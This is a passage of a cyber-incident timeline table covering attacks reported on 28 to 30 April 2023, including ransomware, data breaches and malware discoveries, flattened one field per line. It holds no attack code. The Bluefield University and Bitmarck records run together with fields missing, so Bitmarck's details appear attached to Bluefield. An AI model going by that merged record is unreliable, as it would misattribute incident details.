The National Smallbore Rifle Association (NSRA) confirms that it has been the victim of a cyber-attack.
Unknown
Other service activities
Cyber Crime
UK
National Smallbore Rifle Association, NSRA
159
28/04/2023
Since 2022
'Recently'
AresLoader
Multiple organizations using Citrix
Researchers from Cyble discover a new loader called AresLoader that has been used to spread several malware families.
Malware
Multiple Industries
Cyber Crime
>1
Cyble, AresLoader
160
28/04/2023
During March and April 2023
During March and April 2023
Rapture
Multiple organizations
Researchers from Trend Micro discover a new ransomware strain, dubbed Rapture, showing similarities with the Paradise ransomware.
Malware
Multiple Industries
Cyber Crime
>1
Trend Micro, ransomware, Rapture, Paradise
161
28/04/2023
Since at least 28/04/2023
28/04/2023
?
Romanian telecom customers
Researchers from Heimdal discover an active phishing campaign that appears to specifically target Romanian telecom customers.
Account Takeover
Individual
Cyber Crime
RO
Heimdal
162
28/04/2023
12/03/2023
12/03/2023
?
Diocese of Las Vegas
The Diocese of Las Vegas announces a cybersecurity breach that potentially compromised "sensitive information of its volunteers, parishioners, donors and other stakeholders."
Unknown
Other service activities
Cyber Crime
US
Diocese of Las Vegas
163
28/04/2023
-
-
?
Multiple organizations
Researchers from Trend Micro discover an infostealer mimicking a ChatGPT Windows desktop client that’s capable of copying saved credentials from the Google Chrome login data folder.
Malware
Multiple Industries
Cyber Crime
>1
Trend Micro, ChatGPT
164
28/04/2023
28/04/2023
28/04/2023
?
0VIX
Decentralized-finance protocol 0VIX loses roughly $2 million in a flash-loan exploit.
Flash Loan
Fintech
Cyber Crime
N/A
0VIX
165
28/04/2023
Between 29/03/2023 and 14/04/2023
30/03/2023
ALPHV AKA BlackCat
NextGen Healthcare
NextGen Healthcare, a U.S.-based provider of electronic health record software, admits that hackers breached its systems and stole the personal data of 1.05 million patients.
Malware
Professional, scientific and technical
Cyber Crime
US
NextGen Healthcare, ransomware, ALPHV, BlackCat
166
28/04/2023
-
23/06/2022
?
HealthPlan Services
HealthPlan Services files a notice of data breach after learning that a recent malware attack subjected confidential consumer information in the company’s possession to unauthorized access.
Malware
Professional, scientific and technical
Cyber Crime
US
HealthPlan Services
167
28/04/2023
'Recently'
'Recently'
?
Berlin Packaging
Berlin Packaging files a notice of data breach after discovering that a recent cyberattack compromised confidential human resources information stored on the company’s computer network.
Unknown
Manufacturing
Cyber Crime
US
Berlin Packaging
168
28/04/2023
20/04/2023
20/04/2023
Royal
Montana State University
Montana State University posts a notice informing students and employees of a system outage. The Royal ransomware group claims responsibility for the attack.
Malware
Education
Cyber Crime
US
Montana State University, Royal, ransomware
169
28/04/2023
Between 28/11/2022 and 06/12/2022
04/12/2022
?
Pinnacle Propane
Pinnacle Propane files a notice of data breach after confirming that consumer data within the company’s possession was leaked as a result of a recent cyberattack.
Unknown
Electricity, gas steam, air conditioning
Cyber Crime
US
Pinnacle Propane
170
28/04/2023
Between 19/02/2023 and 25/02/2023
-
?
United Healthcare (UHC)
UnitedHealthcare (UHC) reports a data breach after the organization identified suspicious activity on the UHC mobile application.
Credential Stuffing
Human health and social work
Cyber Crime
US
United Healthcare, UHC
171
28/04/2023
Since at least 13/04/2023
Since at least 13/04/2023
Cl0p and LockBit
Healthcare organizations in the U.S.
The Health Sector Cybersecurity Coordination Center (HC3) issues a sector alert about the current operations of the Clop and LockBit ransomware groups, which have recently been leveraging three known vulnerabilities, CVE-2023-27350 and CVE-2023-27351 in PaperCut and CVE-2023-0669 in Fortra's GoAnywhere MFT, to target healthcare organizations.
CVE-2023-27351, CVE-2023-27350, and CVE-2023-0669 vulnerabilities
Human health and social work
Cyber Crime
US
Health Sector Cybersecurity Coordination Center, HC3, Cl0p, LockBit, ransomware, PaperCut, GoAnywhere MFT, CVE-2023-27351, CVE-2023-27350, CVE-2023-0669
172
28/04/2023
During March 2023
-
?
Aetonix Systems
Health and personal information of up to 100,000 patients at Queensway Carleton Hospital are affected by a major data breach involving Aetonix Systems, an Ottawa-based third-party software provider.
Unknown
Professional, scientific and technical
Cyber Crime
CA
Queensway Carleton Hospital, Aetonix Systems
173
29/04/2023
-
-
Sandworm AKA FROZENBARENTS
Ukrainian state networks
The Computer Emergency Response Team of Ukraine (CERT-UA) reveals that the Russian 'Sandworm' hacking group has been linked to an attack on Ukrainian state networks in which WinRAR was used to destroy data on government devices.
Malware
Public admin and defence, social security
Cyber Warfare
UA
Sandworm, FROZENBARENTS, Computer Emergency Response Team of Ukraine, CERT-UA, WinRAR
174
29/04/2023
-
28/04/2023
?
Orqa
Orqa, a maker of First Person View (FPV) drone racing goggles, claims that a contractor introduced code into its devices' firmware that acted as a time bomb designed to brick them.
Malware
Manufacturing
Cyber Crime
HR
Orqa
175
29/04/2023
-
-
?
County of Spartanburg
The South Carolina county of Spartanburg is dealing with a ransomware attack that has limited its IT and phone systems.
Malware
Public admin and defence, social security
Cyber Crime
US
South Carolina, County of Spartanburg, ransomware
176
29/04/2023
-
-
LockBit 3.0
Relentless Church
The notorious LockBit ransomware group adds South Carolina-based Relentless Church to its list of victims, claiming to have stolen employee data ranging from passports to financial documents.
Malware
Other service activities
Cyber Crime
US
LockBit 3.0, LockBit, ransomware, Relentless Church
177
30/04/2023
30/04/2023
30/04/2023
Avos Locker
Bluefield University
Bluefield University is hit with an Avos Locker ransomware attack. A few days later the ransomware gang hijacks the University's emergency broadcast system, "RamAlert," to send students and staff SMS texts and email alerts that their data was stolen and would soon be released.
Bitmarck, one of the largest IT service providers within Germany’s statutory health insurance system, announces to have taken all of its customer and internal systems offline due to a cyberattack.
Unknown
Professional, scientific and technical
Cyber Crime
DE
Bitmarck
179
30/04/2023
-
-
?
Nashua School District
The Nashua School District discloses that it was hit by a "sophisticated" cyberattack.
Unknown
Education
Cyber Crime
US
Nashua School District
180
30/04/2023
-
-
Karakurt
Our Sunday Visitor
Data extortion group Karakurt claims it attacked Our Sunday Visitor, a Catholic publishing company. The attackers claim to have stolen 130 gigabytes of data, including accounting documents, HR information, employee data, financial contracts, invoices, marketing information and more.
Malware
Information and communication
Cyber Crime
US
Karakurt, Our Sunday Visitor, ransomware
Columns: ID | Date Reported | Date Occurred | Date Discovered | Author | Target | Description | Attack | Target Class | Attack Class | Country | Link | Tags
The “Breachometer” compares the current number of events/day with the max and min values recorded in the previous 12 months.